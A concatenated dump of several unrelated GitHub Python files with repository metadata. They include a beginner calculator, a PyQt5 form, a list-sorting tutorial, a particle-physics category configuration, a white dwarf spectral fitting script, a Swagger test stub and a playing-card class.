3f8f37c93b7b3054adec950e900f86e9dbe50c09
|
360f2f8489187e243f23fa552c36a89dd48d3795
|
/zadaca8.3.py
|
b9c5aa56718d37b71f1c9d148cbab3097b24046e
|
[] |
no_license
|
stanic-mia/Zadaca08
|
bfdd25e58f20ff69a4e41d0e6a16eb4345172f8e
|
7afe513cd2ec34e59e83eaf396bece78ab860131
|
refs/heads/main
| 2023-02-03T08:00:28.156554
| 2020-12-21T09:54:54
| 2020-12-21T09:54:54
| 323,285,677
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 555
|
py
|
brojA = int(input("Unesite prvi broj: "))
brojB = int(input("Unesite drugi broj: "))
operacija = input("Unesite računsku operaciju (+, -, *, /): ")
if operacija == "+":
print("Rezultat zbrajanja je: " + str(brojA + brojB))
elif operacija == "-":
print("Rezultat oduzimanja je: " + str(brojA - brojB))
elif operacija == "*":
print("Rezultat množenja je: " + str(brojA * brojB))
elif operacija == "/":
print("Rezultat dijeljenja je: " + str(brojA / brojB))
else:
print("Ne prepoznajem ovu računsku operaciju.")
|
[
"noreply@github.com"
] |
stanic-mia.noreply@github.com
|
767266bd140e0c8874953355ff300d128e4c125b
|
47dea5236f93d79a049e3de40a065ae5d0713e50
|
/mainEditarArrendatario.py
|
ce008c0622b3ce4ede4c7ceb38c9fe320cba4440
|
[] |
no_license
|
WilliamsScott/sicurezzaPy
|
d10548b6688dbfede9a4fcb5280f03987b0a5b30
|
76653773358249658865307defea8aa1ca7c1bfb
|
refs/heads/master
| 2020-06-03T04:52:08.705513
| 2019-06-11T20:58:26
| 2019-06-11T20:58:26
| 191,446,137
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,279
|
py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mainEditarArrendatario.ui'
#
# Created by: PyQt5 UI code generator 5.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainEditarArrendatario(object):
def setupUi(self, MainEditarArrendatario):
MainEditarArrendatario.setObjectName("MainEditarArrendatario")
MainEditarArrendatario.resize(800, 600)
self.centralwidget = QtWidgets.QWidget(MainEditarArrendatario)
self.centralwidget.setObjectName("centralwidget")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(290, 20, 201, 41))
font = QtGui.QFont()
font.setPointSize(14)
self.label.setFont(font)
self.label.setObjectName("label")
self.txtRut = QtWidgets.QLineEdit(self.centralwidget)
self.txtRut.setGeometry(QtCore.QRect(280, 130, 251, 22))
self.txtRut.setObjectName("txtRut")
self.txtNombre = QtWidgets.QLineEdit(self.centralwidget)
self.txtNombre.setGeometry(QtCore.QRect(280, 170, 251, 22))
self.txtNombre.setObjectName("txtNombre")
self.txtApellido = QtWidgets.QLineEdit(self.centralwidget)
self.txtApellido.setGeometry(QtCore.QRect(280, 210, 251, 22))
self.txtApellido.setObjectName("txtApellido")
self.txtTelefono = QtWidgets.QLineEdit(self.centralwidget)
self.txtTelefono.setGeometry(QtCore.QRect(280, 250, 251, 22))
self.txtTelefono.setObjectName("txtTelefono")
self.label_5 = QtWidgets.QLabel(self.centralwidget)
self.label_5.setGeometry(QtCore.QRect(190, 250, 55, 16))
self.label_5.setObjectName("label_5")
self.label_4 = QtWidgets.QLabel(self.centralwidget)
self.label_4.setGeometry(QtCore.QRect(200, 210, 55, 16))
self.label_4.setObjectName("label_4")
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setGeometry(QtCore.QRect(210, 126, 55, 20))
self.label_2.setObjectName("label_2")
self.label_3 = QtWidgets.QLabel(self.centralwidget)
self.label_3.setGeometry(QtCore.QRect(200, 170, 55, 16))
self.label_3.setObjectName("label_3")
self.btnBuscar = QtWidgets.QPushButton(self.centralwidget)
self.btnBuscar.setGeometry(QtCore.QRect(550, 130, 93, 28))
self.btnBuscar.setObjectName("btnBuscar")
self.btnGuardar = QtWidgets.QPushButton(self.centralwidget)
self.btnGuardar.setGeometry(QtCore.QRect(560, 410, 93, 28))
self.btnGuardar.setObjectName("btnGuardar")
MainEditarArrendatario.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainEditarArrendatario)
self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 26))
self.menubar.setObjectName("menubar")
MainEditarArrendatario.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainEditarArrendatario)
self.statusbar.setObjectName("statusbar")
MainEditarArrendatario.setStatusBar(self.statusbar)
self.retranslateUi(MainEditarArrendatario)
QtCore.QMetaObject.connectSlotsByName(MainEditarArrendatario)
def retranslateUi(self, MainEditarArrendatario):
_translate = QtCore.QCoreApplication.translate
MainEditarArrendatario.setWindowTitle(_translate("MainEditarArrendatario", "MainWindow"))
self.label.setText(_translate("MainEditarArrendatario", "Editar Arrendatario"))
self.label_5.setText(_translate("MainEditarArrendatario", "Telefono"))
self.label_4.setText(_translate("MainEditarArrendatario", "Apellido"))
self.label_2.setText(_translate("MainEditarArrendatario", "Rut"))
self.label_3.setText(_translate("MainEditarArrendatario", "Nombre"))
self.btnBuscar.setText(_translate("MainEditarArrendatario", "Buscar"))
self.btnGuardar.setText(_translate("MainEditarArrendatario", "Guardar"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainEditarArrendatario = QtWidgets.QMainWindow()
ui = Ui_MainEditarArrendatario()
ui.setupUi(MainEditarArrendatario)
MainEditarArrendatario.show()
sys.exit(app.exec_())
|
[
"wmejias97@gmail.com"
] |
wmejias97@gmail.com
|
f4b603d1599486d77c94fb8d33f2757497d0a40f
|
a9113d2ef0ba68a5fb882a7b06954b58500589a1
|
/B10_T1_Sort_Lists.py
|
96ed2186e503e978b95a8f2d07ffc9c4d6f01493
|
[] |
no_license
|
karthiklingasamy/Python_Sandbox
|
4194f6bdfc13a62b6a43fc104354c428adb8f7c1
|
c1c352a220c76804609067c9f02945c535847378
|
refs/heads/master
| 2020-12-27T06:50:30.582174
| 2020-02-02T16:50:26
| 2020-02-02T16:50:26
| 237,802,723
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 597
|
py
|
li = [8,7,6,9,3,2,5,4,1]
print(li)
# To sort without impacting the ordinal list use sorted() function
s_li = sorted(li) # Create new variable to see the results
print('Sorted Variable:', s_li)
# To sort original list without using new variable use sort() method
li.sort()
print('Original Variable:', li)
# Difference between sorted() function and sort method
# Key Take away is sorted() function gives new sorted list and the sort function perform sort inplace
s_li = li.sort()
print(s_li)
# Sort in descending order
s_li = sorted(li,reverse=True)
li.sort(reverse=True)
|
[
"noreply@github.com"
] |
karthiklingasamy.noreply@github.com
|
99bb55217063b4eccb9f79e6e03780c46df5d6a8
|
5297825412a061d7b44e4379c02f21f618c1c578
|
/maoyan/models.py
|
2b40aa65e8e6dccb74627c29311db1096ac0485d
|
[] |
no_license
|
xiaolifeidao123456/spider
|
63c2b8664ef98b84632e6a3b7493d0d5d0b1c3cd
|
b02958d06b5f8b91fc6fc6de2a8f331ae764418d
|
refs/heads/master
| 2020-03-29T04:50:26.405292
| 2018-09-20T11:04:23
| 2018-09-20T11:07:30
| 149,551,394
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 200
|
py
|
# import scrapy
#
# class MovieItem(scrapy.Item):
# # 电影名字
# title = scrapy.Field()
# # 主演
# start = scrapy.Field()
# # 上映时间
# releasetime = scrapy.Field()
|
[
"1062959398@qq.com"
] |
1062959398@qq.com
|
3d4a418da0e12ece71efa3b7f76035ee453690bd
|
811a15aceb8f35fa738fa01e30e5003460715706
|
/DA_fitter.py
|
db47929e9a2eb5679d0d18ad6b8e96344aa8268f
|
[] |
no_license
|
CManser/WD_MWS_pipeline
|
2e3660e3504f261f3daf74fdacb8762c215a61d8
|
99ef0b73d842dfda072f902745635a99b9453991
|
refs/heads/master
| 2021-03-02T14:54:29.652384
| 2020-03-08T19:43:49
| 2020-03-08T19:43:49
| 245,876,738
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,998
|
py
|
import MWS_WD_scripts
import numpy as np
import sys
import matplotlib.pyplot as plt
import os
import scipy.interpolate
c = 299792.458 # Speed of light in km/s
stdwave = np.arange(3000,11000.1, 0.1)
inp = sys.argv[1]
name = inp.split('/')[-1]
file_path = inp[:-1*len(name)]
print('\n' + name)
filename = inp
name_r, name_z = filename.replace('-b', '-r'), filename.replace('-b', '-z')
spectra_b = np.loadtxt(filename,usecols=(0,1,2),unpack=True).transpose()
spectra_b[:,2] = spectra_b[:,2]**-0.5
spectra_r = np.loadtxt(name_r,usecols=(0,1,2),unpack=True).transpose()
spectra_r[:,2] = spectra_r[:,2]**-0.5
spectra_z = np.loadtxt(name_z,usecols=(0,1,2),unpack=True).transpose()
spectra_z[:,2] = spectra_z[:,2]**-0.5
training_set = MWS_WD_scripts.load_training_set()
WD_type = MWS_WD_scripts.WD_classify(spectra_b, spectra_r, training_set = training_set)
print(WD_type[0])
best_T, best_T_err, best_g, best_g_err, best_rv, s_best_T, s_best_T_err, s_best_g, s_best_g_err, StN = MWS_WD_scripts.fit_DA(spectra_b[(np.isnan(spectra_b[:,1])==False) & (spectra_b[:,0]>3500)], plot = True, verbose_output = True)
modwave = stdwave*(best_rv+c)/c
model = MWS_WD_scripts.interpolating_model_DA(best_T,best_g/100, fine_models = True)
model2 = MWS_WD_scripts.interpolating_model_DA(s_best_T,s_best_g/100, fine_models = True)
# Plotting
fig = plt.figure(figsize= (11,9))
axes1 = fig.add_axes([0,0.45,1,0.55])
axes2 = fig.add_axes([0,0,1,0.4])
axes1.text(0.45, 0.95, name[:-6], transform=axes1.transAxes, fontsize = 14)
axes1.text(0.45, 0.90, 'T = {:.1f} +/- {:.1f} K | logg = {:.3f} +/- {:.3f}'.format(best_T, best_T_err, best_g/100, best_g_err/100), transform=axes1.transAxes, fontsize = 14)
axes1.text(0.45, 0.85, 'T2 = {:.1f} +/- {:.1f} K | logg2 = {:.3f} +/- {:.3f}'.format(s_best_T, s_best_T_err, s_best_g/100, s_best_g_err/100), transform=axes1.transAxes, fontsize = 14)
axes1.text(0.45, 0.80, 'rv = {:.2f} km/s | S/N = {:.1f}'.format(best_rv, StN), transform=axes1.transAxes, fontsize = 14)
axes1.plot(spectra_b[:,0], spectra_b[:,1], color = '0.2', lw = 1.0)
axes1.plot(spectra_r[:,0], spectra_r[:,1], color = '0.3', lw = 1.0)
axes1.plot(spectra_z[:,0], spectra_z[:,1], color = '0.3', lw = 1.0)
check_f_spec=spectra_b[:,1][(spectra_b[:,0]>4500.) & (spectra_b[:,0]<4700.)]
model[np.isnan(model)] = 0.0
check_f_model = model[(modwave > 4500) & (modwave < 4700)]
adjust = np.average(check_f_model)/np.average(check_f_spec)
axes1.plot(modwave[(modwave > 3600.0) & (modwave < 10500.0)], model[(modwave > 3600.0) & (modwave < 10500.0)]/adjust, color = 'red', alpha = 0.9, lw = 0.8)
model2[np.isnan(model2)] = 0.0
check_f_model2 = model2[(modwave > 4500) & (modwave < 4700)]
adjust2 = np.average(check_f_model2)/np.average(check_f_spec)
axes1.plot(modwave[(modwave > 3600.0) & (modwave < 10500.0)], model2[(modwave > 3600.0) & (modwave < 10500.0)]/adjust2, color = 'blue', alpha = 0.7, lw = 0.8)
axes1.set_ylabel('Flux',fontsize=12)
axes2.set_xlabel('Wavelength (Angstroms)',fontsize=12)
axes1.set_xlim(3500, 10600)
axes2.set_xlim(3500, 10600)
axes2.set_ylim(0.2, 1.8)
func = scipy.interpolate.interp1d(modwave, model)
model_b = func(spectra_b[:,0])
model_r = func(spectra_r[:,0])
model_z = func(spectra_z[:,0])
func2 = scipy.interpolate.interp1d(modwave, model2)
model2_b = func2(spectra_b[:,0])
model2_r = func2(spectra_r[:,0])
model2_z = func2(spectra_z[:,0])
axes2.plot(spectra_b[:,0], spectra_b[:,1]/model_b*adjust, color = 'red', alpha = 0.9, lw = 0.5)
axes2.plot(spectra_r[:,0], spectra_r[:,1]/model_r*adjust, color = 'red', alpha = 0.9, lw = 0.5)
axes2.plot(spectra_z[:,0], spectra_z[:,1]/model_z*adjust, color = 'red', alpha = 0.9, lw = 0.5)
axes2.plot(spectra_b[:,0], spectra_b[:,1]/model2_b*adjust2, color = 'blue', alpha = 0.4, lw = 0.5)
axes2.plot(spectra_r[:,0], spectra_r[:,1]/model2_r*adjust2, color = 'blue', alpha = 0.4, lw = 0.5)
axes2.plot(spectra_z[:,0], spectra_z[:,1]/model2_z*adjust2, color = 'blue', alpha = 0.4, lw = 0.5)
axes2.axhline(1, ls = '--', lw = 0.5, color = '0.3')
save_path = file_path + '/fits/'
if not os.path.isdir(save_path):
try:
os.mkdir(save_path)
except OSError:
print('Could not make path {:s}'.format(save_path))
else:
print ("Successfully created the directory {:s}".format(save_path))
plt.savefig('{:s}{:s}_fitted.pdf'.format(save_path,name[:-6]), bbox_inches = 'tight')
plt.close()
if (StN > 10.0) & (WD_type == 'DA'):
compare_b = np.vstack((spectra_b[:,0], spectra_b[:,1]/model_b*adjust, spectra_b[:,2]/model_b*adjust)).transpose()
compare_r = np.vstack((spectra_r[:,0], spectra_r[:,1]/model_r*adjust, spectra_r[:,2]/model_r*adjust)).transpose()
compare_z = np.vstack((spectra_z[:,0], spectra_z[:,1]/model_z*adjust, spectra_z[:,2]/model_z*adjust)).transpose()
np.savetxt('{:s}{:s}-b_compare.dat'.format(save_path,name[:-6]), compare_b)
np.savetxt('{:s}{:s}-r_compare.dat'.format(save_path,name[:-6]), compare_r)
np.savetxt('{:s}{:s}-z_compare.dat'.format(save_path,name[:-6]), compare_z)
#plt.show()
|
[
"noreply@github.com"
] |
CManser.noreply@github.com
|
e098d6c21f58e58491d74aa19724a3243abf4a13
|
915ea8bcabf4da0833d241050ef226100f7bd233
|
/SDKs/Python/test/test_add_contact_log_type.py
|
f6cd3f13996b307b1bf6cb61f610404ecbbae465
|
[
"BSD-2-Clause"
] |
permissive
|
parserrr/API-Examples
|
03c3855e2aea8588330ba6a42d48a71eb4599616
|
0af039afc104316f1722ee2ec6d2881abd3fbc07
|
refs/heads/master
| 2020-07-10T22:17:24.906233
| 2019-08-26T03:06:21
| 2019-08-26T03:06:21
| 204,382,917
| 0
| 0
| null | 2019-08-26T02:48:16
| 2019-08-26T02:48:15
| null |
UTF-8
|
Python
| false
| false
| 966
|
py
|
# coding: utf-8
"""
MINDBODY Public API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.add_contact_log_type import AddContactLogType # noqa: E501
from swagger_client.rest import ApiException
class TestAddContactLogType(unittest.TestCase):
"""AddContactLogType unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testAddContactLogType(self):
"""Test AddContactLogType"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.add_contact_log_type.AddContactLogType() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"christopher.volpi@mindbodyonline.com"
] |
christopher.volpi@mindbodyonline.com
|
8075009ac3e6a2b508e0c69650729de3d981023f
|
cdd43e5400d93e406bcea9b3b332e416f09cbb2a
|
/card.py
|
7ad7121cc826cac891c26dff0831d01b25eb54dd
|
[] |
no_license
|
shruti420/War
|
3580670ed1d0690c635cb0ebbfa2ac91e4ff1d91
|
10072cbe32aae2ae46987eb135ca7b07ad1baacf
|
refs/heads/main
| 2023-06-30T13:29:48.431548
| 2021-08-01T19:17:13
| 2021-08-01T19:17:13
| 391,712,473
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 967
|
py
|
class Card:
suits = ["spades", "hearts","diamonds","clubs"]
values=[None, None, "2","3","4","5","6","7","8","9","10","Jack","Queen","King", "Ace"]
def __init__(self,v,s):
""" suit + value are ints"""
self.value=v
self.suit=s
def __lt__(self,c2):
if self.value <c2.value:
return True
if self.value== c2.value:
if self.suit < c2.suit:
return True
else:
return False
def __gt__(self, c2):
if self.value >c2.value:
return True
if self.value== c2.value:
if self.suit>c2.suit:
return True
else:
return False
return False
def __repr__(self):
v= self.values[self.value]+ "of" + self.suits[self.suit]
return v
card1= Card(10,2)
card2 = Card(11,3)
print(card1 < card2)
|
[
"noreply@github.com"
] |
shruti420.noreply@github.com
|
2815b4c6b972718b4f6cde4c85bc7f35594f15dd
|
57a3a9065ff67eb57eb24fe1615aad41bbc916be
|
/configs/categories_config_vtag_Bacon_nomet.py
|
826bfd0c32ff97b4db5a3eafb9c4ae481f3fcc7d
|
[] |
no_license
|
blallen/DmsMonoX
|
2eb1b6bc415c6f4ceff3ec803c2de662b8470156
|
5dd52783032f536335e492a0931764650d690571
|
refs/heads/master
| 2020-12-30T23:21:34.757629
| 2015-02-24T15:06:21
| 2015-02-24T15:06:21
| 37,859,155
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,905
|
py
|
# Configuration for the Mono-X categories
out_file_name = 'mono-x-vtagged.root'
BINS = [250.0 , 260.0 , 270.0 , 280.0 , 290.0 , 300.0 , 310.0 , 320.0 , 330.0,340,360,380,420,510,1000]
BINS = range(250,550,50)
BINS.append(1000)
categories = [
{
'name':"resolved"
,'in_file_name':"resolved-combo.root"
,"cutstring":"mvamet>250 && mvamet<1000"
,"varstring":["mvamet",250,1000]
,"weightname":"weight"
,"additionalvars":[['jet1pt',25,150,1000]]
,"pdfmodel":1
,"bins":BINS[:]
,"recoilMC" :"recoilfits/recoilfit_Zgj_pfmetraw_2012_mc.root"
,"recoilData":"recoilfits/recoilfit_Zgj_pfmetraw_2012_data.root"
,"muonSF" : 0.985
,"photonSF": 0.97
,"samples":
{ # Format is TreeName : ['region','process',isMC,isSignal] !! Note isSignal means DM/Higgs etc for signal region but Z-jets/W-jets for the di/single-muon regions !!
# Signal Region
"Znunu_signal" :['signal','zjets',1,0]
,"Zll_signal" :['signal','zll',1,0]
,"Wjets_signal" :['signal','wjets',1,0]
,"WW_signal" :['signal','dibosons',1,0]
,"WZ_signal" :['signal','dibosons',1,0]
,"ZZ_signal" :['signal','dibosons',1,0]
,"ttbar_signal" :['signal','top',1,0]
,"SingleTop_signal" :['signal','top',1,0]
,"QCD_signal" :['signal','qcd',1,0]
,"ggH125_signal" :['signal','ggH',1,1]
,"VBFH125_signal" :['signal','vbf',1,1]
,"WH125_signal" :['signal','wh',1,1]
,"ZH125_signal" :['signal','zh',1,1]
,"data_signal" :['signal','data',0,0]
# Di muon-Control
,"Zll_di_muon_control" :['dimuon','zll',1,1]
,"Znunu_di_muon_control" :['dimuon','zjets',1,0]
,"Wjets_di_muon_control" :['dimuon','wjets',1,0]
,"WW_di_muon_control" :['dimuon','dibosons',1,0]
,"WZ_di_muon_control" :['dimuon','dibosons',1,0]
,"ZZ_di_muon_control" :['dimuon','dibosons',1,0]
,"ttbar_di_muon_control" :['dimuon','top',1,0]
,"SingleTop_di_muon_control" :['dimuon','top',1,0]
#,"QCD_di_muon_control" :['dimuon','qcd',1,0]
,"data_di_muon_control" :['dimuon','data',0,0]
# Single muon control
,"Zll_single_muon_control" :['singlemuon','zll',1,0]
,"Znunu_single_muon_control" :['singlemuon','zjets',1,0]
,"Wjets_single_muon_control" :['singlemuon','wjets',1,1]
,"WW_single_muon_control" :['singlemuon','dibosons',1,0]
,"WZ_single_muon_control" :['singlemuon','dibosons',1,0]
,"ZZ_single_muon_control" :['singlemuon','dibosons',1,0]
,"ttbar_single_muon_control" :['singlemuon','top',1,0]
,"SingleTop_single_muon_control" :['singlemuon','top',1,0]
,"QCD_single_muon_control" :['singlemuon','qcd',1,0]
,"data_single_muon_control" :['singlemuon','data',0,0]
# photon control
,"data_photon_control" :['photon','data',0,0]
,"Photon_photon_control" :['photon','gjet',1,1]
,"Zll_photon_control" :['photon','zll',1,0]
,"Wjets_photon_control" :['photon','wjets',1,0]
,"WW_photon_control" :['photon','dibosons',1,0]
,"ZZ_photon_control" :['photon','dibosons',1,0]
,"ttbar_photon_control" :['photon','top',1,0]
,"SingleTop_photon_control" :['photon','top',1,0]
,"QCD_photon_control" :['photon','qcd',1,0]
}
,"metsamples": # For Recoil Corrections
{
#Di Muon Control Region
"Zll_di_muon_control","Znunu_di_muon_control","Wjets_di_muon_control","WW_di_muon_control","WZ_di_muon_control","ZZ_di_muon_control",
"ttbar_di_muon_control","SingleTop_di_muon_control",
#Single Muon Control Region
"Wjets_single_muon_control","Zll_single_muon_control","WW_single_muon_control","WZ_single_muon_control","ZZ_single_muon_control","ttbar_single_muon_control",
"SingleTop_single_muon_control",
#Photon Control Region
"Photon_photon_control","Wjets_photon_control","Zll_photon_control","WW_photon_control","ZZ_photon_control","ttbar_photon_control","SingleTop_photon_control",
"QCD_photon_control",
#Signal Region
"Wjets_signal","Zll_signal","WW_signal","WZ_signal","ZZ_signal","ttbar_signal","SingleTop_signal","QCD_signal",
"ggH125_signal" ,"VBFH125_signal" ,"WH125_signal" ,"ZH125_signal","Znunu_signal"
},
},
{
'name':"boosted"
,'in_file_name':"boosted-combo.root"
,"cutstring":"mvamet>250 && mvamet<1000"
,"varstring":["mvamet",250,1000]
,"weightname":"weight"
,"bins":BINS[:]
,"additionalvars":[['jet1pt',25,150,1000]]
,"pdfmodel":0
,"recoilMC" :"recoilfits/recoilfit_Zgj_pfmetraw_2012_mc.root"
,"recoilData":"recoilfits/recoilfit_Zgj_pfmetraw_2012_data.root"
,"muonSF" : 0.985
,"photonSF": 0.97
,"samples":
{ # Format is TreeName : ['region','process',isMC,isSignal] !! Note isSignal means DM/Higgs etc for signal region but Z-jets/W-jets for the di/single-muon regions !!
# Signal Region
"Znunu_signal" :['signal','zjets',1,0]
,"Zll_signal" :['signal','zll',1,0]
,"Wjets_signal" :['signal','wjets',1,0]
,"WW_signal" :['signal','dibosons',1,0]
,"WZ_signal" :['signal','dibosons',1,0]
,"ZZ_signal" :['signal','dibosons',1,0]
,"ttbar_signal" :['signal','top',1,0]
,"SingleTop_signal" :['signal','top',1,0]
,"QCD_signal" :['signal','qcd',1,0]
,"ggH125_signal" :['signal','ggH',1,1]
,"VBFH125_signal" :['signal','vbf',1,1]
,"WH125_signal" :['signal','wh',1,1]
,"ZH125_signal" :['signal','zh',1,1]
#,"GV_signal" :['signal','gv',1,0]
,"data_signal" :['signal','data',0,0]
# Di muon-Control
,"Zll_di_muon_control" :['dimuon','zll',1,1]
,"Znunu_di_muon_control" :['dimuon','zjets',1,0]
,"Wjets_di_muon_control" :['dimuon','wjets',1,0]
,"WW_di_muon_control" :['dimuon','dibosons',1,0]
,"WZ_di_muon_control" :['dimuon','dibosons',1,0]
,"ZZ_di_muon_control" :['dimuon','dibosons',1,0]
,"ttbar_di_muon_control" :['dimuon','top',1,0]
,"SingleTop_di_muon_control" :['dimuon','top',1,0]
#,"QCD_di_muon_control" :['dimuon','qcd',1,0]
#,"GV_di_muon_control" :['dimuon','gv',1,0]
,"data_di_muon_control" :['dimuon','data',0,0]
# Single muon control
,"Zll_single_muon_control" :['singlemuon','zll',1,0]
#,"Znunu_single_muon_control" :['singlemuon','zjets',1,0]
,"Wjets_single_muon_control" :['singlemuon','wjets',1,1]
,"ZZ_single_muon_control" :['singlemuon','dibosons',1,0]
,"WW_single_muon_control" :['singlemuon','dibosons',1,0]
,"WZ_single_muon_control" :['singlemuon','dibosons',1,0]
,"SingleTop_single_muon_control" :['singlemuon','top',1,0]
,"ttbar_single_muon_control" :['singlemuon','top',1,0]
,"QCD_single_muon_control" :['singlemuon','qcd',1,0]
#,"GV_single_muon_control" :['singlemuon','gv',1,0]
,"data_single_muon_control" :['singlemuon','data',0,0]
,"data_photon_control" :['photon','data',0,0]
,"Photon_photon_control" :['photon','gjet',1,1]
,"Zll_photon_control" :['photon','zll',1,0]
,"Wjets_photon_control" :['photon','wjets',1,0]
,"WW_photon_control" :['photon','dibosons',1,0]
,"ZZ_photon_control" :['photon','dibosons',1,0]
,"ttbar_photon_control" :['photon','top',1,0]
,"SingleTop_photon_control" :['photon','top',1,0]
,"QCD_photon_control" :['photon','qcd',1,0]
},
"metsamples":
{
#Di Muon Control Region
"Zll_di_muon_control","Znunu_di_muon_control","Wjets_di_muon_control","WW_di_muon_control","WZ_di_muon_control","ZZ_di_muon_control",
"ttbar_di_muon_control","SingleTop_di_muon_control",
#Single Muon Control Region
"Wjets_single_muon_control","Zll_single_muon_control","WW_single_muon_control","WZ_single_muon_control","ZZ_single_muon_control","ttbar_single_muon_control",
"SingleTop_single_muon_control",
#Photon Control Region
"Photon_photon_control","Wjets_photon_control","Zll_photon_control","WW_photon_control","ZZ_photon_control","ttbar_photon_control","SingleTop_photon_control",
"QCD_photon_control",
#Signal Region
"Wjets_signal","Zll_signal","WW_signal","WZ_signal","ZZ_signal","ttbar_signal","SingleTop_signal","QCD_signal",
"ggH125_signal" ,"VBFH125_signal" ,"WH125_signal" ,"ZH125_signal","Znunu_signal"
},
},
{
'name':"inclusive"
,'in_file_name':"monojet-combo.root"
#,'in_file_name':"inclusive-combo.root"
,"cutstring":"mvamet>200 && mvamet<1000"
,"varstring":["mvamet",200,1000]
,"weightname":"weight"
,"bins":[200.0 , 210.0 , 220.0 , 230.0 , 240.0 , 250.0 , 260.0 , 270.0 , 280.0 , 290.0 , 300.0 , 310.0 , 320.0 , 330.0,340,360,380,420,510,1000]
,"additionalvars":[['jet1pt',25,150,1000]]
,"pdfmodel":0
,"recoilMC" :"recoilfits/recoilfit_Zgj_pfmetraw_2012_mc.root"
,"recoilData":"recoilfits/recoilfit_Zgj_pfmetraw_2012_data.root"
,"muonSF" : 0.985
,"photonSF": 0.97
,"samples":
{ # Format is TreeName : ['region','process',isMC,isSignal] !! Note isSignal means DM/Higgs etc for signal region but Z-jets/W-jets for the di/single-muon regions !!
# Signal Region
"Znunu_signal" :['signal','zjets',1,0]
,"Zll_signal" :['signal','zll',1,0]
,"Wjets_signal" :['signal','wjets',1,0]
,"WW_signal" :['signal','dibosons',1,0]
,"WZ_signal" :['signal','dibosons',1,0]
,"ZZ_signal" :['signal','dibosons',1,0]
,"ttbar_signal" :['signal','top',1,0]
,"SingleTop_signal" :['signal','top',1,0]
,"QCD_signal" :['signal','qcd',1,0]
,"ggH125_signal" :['signal','ggH',1,1]
,"VBFH125_signal" :['signal','vbf',1,1]
,"WH125_signal" :['signal','wh',1,1]
,"ZH125_signal" :['signal','zh',1,1]
#,"GV_signal" :['signal','gv',1,0]
,"data_signal" :['signal','data',0,0]
# Di muon-Control
,"Zll_di_muon_control" :['dimuon','zll',1,1]
,"Znunu_di_muon_control" :['dimuon','zjets',1,0]
,"Wjets_di_muon_control" :['dimuon','wjets',1,0]
,"WW_di_muon_control" :['dimuon','dibosons',1,0]
,"WZ_di_muon_control" :['dimuon','dibosons',1,0]
,"ZZ_di_muon_control" :['dimuon','dibosons',1,0]
,"ttbar_di_muon_control" :['dimuon','top',1,0]
,"SingleTop_di_muon_control" :['dimuon','top',1,0]
#,"QCD_di_muon_control" :['dimuon','qcd',1,0]
#,"GV_di_muon_control" :['dimuon','gv',1,0]
,"data_di_muon_control" :['dimuon','data',0,0]
# Single muon control
,"Zll_single_muon_control" :['singlemuon','zll',1,0]
#,"Znunu_single_muon_control" :['singlemuon','zjets',1,0]
,"Wjets_single_muon_control" :['singlemuon','wjets',1,1]
,"ZZ_single_muon_control" :['singlemuon','dibosons',1,0]
,"WW_single_muon_control" :['singlemuon','dibosons',1,0]
,"WZ_single_muon_control" :['singlemuon','dibosons',1,0]
,"SingleTop_single_muon_control" :['singlemuon','top',1,0]
,"ttbar_single_muon_control" :['singlemuon','top',1,0]
,"QCD_single_muon_control" :['singlemuon','qcd',1,0]
#,"GV_single_muon_control" :['singlemuon','gv',1,0]
,"data_single_muon_control" :['singlemuon','data',0,0]
,"data_photon_control" :['photon','data',0,0]
,"Photon_photon_control" :['photon','gjet',1,1]
,"Zll_photon_control" :['photon','zll',1,0]
,"Wjets_photon_control" :['photon','wjets',1,0]
,"WW_photon_control" :['photon','dibosons',1,0]
,"ZZ_photon_control" :['photon','dibosons',1,0]
,"ttbar_photon_control" :['photon','top',1,0]
,"SingleTop_photon_control" :['photon','top',1,0]
,"QCD_photon_control" :['photon','qcd',1,0]
},
"metsamples":
{
#Di Muon Control Region
"Zll_di_muon_control","Znunu_di_muon_control","Wjets_di_muon_control","WW_di_muon_control","WZ_di_muon_control","ZZ_di_muon_control",
"ttbar_di_muon_control","SingleTop_di_muon_control",
#Single Muon Control Region
"Wjets_single_muon_control","Zll_single_muon_control","WW_single_muon_control","WZ_single_muon_control","ZZ_single_muon_control","ttbar_single_muon_control",
"SingleTop_single_muon_control",
#Photon Control Region
"Photon_photon_control","Wjets_photon_control","Zll_photon_control","WW_photon_control","ZZ_photon_control","ttbar_photon_control","SingleTop_photon_control",
"QCD_photon_control",
#Signal Region
"Wjets_signal","Zll_signal","WW_signal","WZ_signal","ZZ_signal","ttbar_signal","SingleTop_signal","QCD_signal",
"ggH125_signal" ,"VBFH125_signal" ,"WH125_signal" ,"ZH125_signal","Znunu_signal"
},
}
]
|
[
"Phil@pb-d-128-141-150-9.cern.ch"
] |
Phil@pb-d-128-141-150-9.cern.ch
|
844f98281de04f478b910610b2b109cddd3c8b53
|
e9969129cd3622c1a5be06216b88ef2cce3cb5d5
|
/old-kata-backup/count_no_of_digit.py
|
b25cc18d102f6be28f5f7a2391570a3c23cd3087
|
[] |
no_license
|
Kalaiyarazan/code_kata
|
f8ce2afb29adf112d9b50a1371a656f2c186988b
|
532327b7d412565441a329f8f2c7de2362d1a68a
|
refs/heads/master
| 2020-07-26T17:40:45.181350
